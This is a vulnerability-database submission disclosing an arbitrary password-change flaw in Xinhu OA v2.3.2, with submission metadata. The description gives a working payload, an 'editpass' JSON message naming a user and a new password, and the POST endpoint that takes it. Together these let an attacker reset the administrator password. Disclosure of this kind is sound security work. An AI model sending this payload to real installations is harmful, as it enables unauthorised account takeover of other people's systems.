Submit #212444: Any user's password modification vulnerability in Xinhuo OA V2.3.2info

TitelAny user's password modification vulnerability in Xinhuo OA V2.3.2
BeschreibungXinghu OA v2.3.2 has a vulnerability in changing the password of any user in the frontend. An attacker can use this vulnerability to change the administrator password and successfully log in to the backend. ​ 1、The payload generated to change the password is as follows: The data passed in is $data='{"msgtype":"editpass","user":"rock","pass":"123"}';, user is the username and pass is the password to be changed. 2、Send request package: POST /xinhu/api.php?m=reimplat&a=index HTTP/1.1 31ae15.X3amdiGpSx5aZqNWaq6NSZVut2MjYWm5UqdTHn1OQWtPFrKuIalKTZGNW4g
Quelle⚠️ https://github.com/magicwave18/vuldb/issues/1
Benutzer
 magicwave18 (UID 52598)
Einreichung24.09.2023 12:47 (vor 3 Jahren)
Moderieren29.09.2023 16:27 (5 days later)
StatusAkzeptiert
VulDB Eintrag240926 [Xinhu RockOA 1.1/2.3.2/15.X3amdi Password api.php?m=reimplat&a=index erweiterte Rechte]
Punkte20

Do you know our Splunk app?

Download it now for free!